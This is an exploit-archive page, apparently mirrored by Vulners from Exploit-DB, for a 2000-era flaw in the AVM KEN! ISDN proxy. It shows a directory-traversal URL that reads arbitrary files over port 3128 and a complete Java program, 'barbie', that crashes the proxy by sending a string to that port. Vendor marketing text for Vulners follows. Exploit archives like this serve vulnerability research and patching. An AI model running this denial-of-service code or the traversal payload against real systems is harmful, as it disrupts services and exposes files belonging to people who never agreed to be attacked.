Lucene search
K

AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service

🗓️ 12 Apr 2000 00:00:00Reported by eAXType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

Remote file retrieval and denial of service vulnerability in AVM KEN! software via port 3128.

Code
source: https://www.securityfocus.com/bid/1103/info

A remote user on the local network is capable of retrieving any known file from a machine running AVM KEN!. This is accomplished by appending ../ to a URL utilizing port 3128 to escape the regular web file structure, and appending the remaining path onto the request.
eg.
http://target:3128/../../../filename.ext

A denial of service attack could also be launched against AVM KEN! by sending random characters to port 3128. A restart would be required in order to regain normal functionality. 

import java.net.Socket;
import java.io.*;

/*
BARBIE - The AVM KEN! exploit

This exploit causes a crash in the AVM KEN! ISDN Proxy software.
All conections will be cut off, but the server will restart again, 
a few seconds later.

Tested with AVM KEN! Version 1.03.10 (german)
*/

class barbie {

String adress;

public void killken() { 
PrintWriter out = null;
try{
    Socket connection = new Socket( adress, 3128);
    System.out.println("");
    System.out.println("killing..."); 
    out  = new PrintWriter(connection.getOutputStream(), true);
    out.println("Whooopppss_Ken_died");
    connection.close();
   }
catch (IOException e)
{
System.out.println("");
System.out.println(" Can't met Ken! ");
}  
}


public static void main (String arguments[]) {
barbie kk = new barbie();
if(arguments.length < 1)
{
System.out.println("");
System.out.println("usage: java barbie <adress/ip>");
System.exit(1);
}
kk.adress = arguments[0];
kk.killken();
}

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation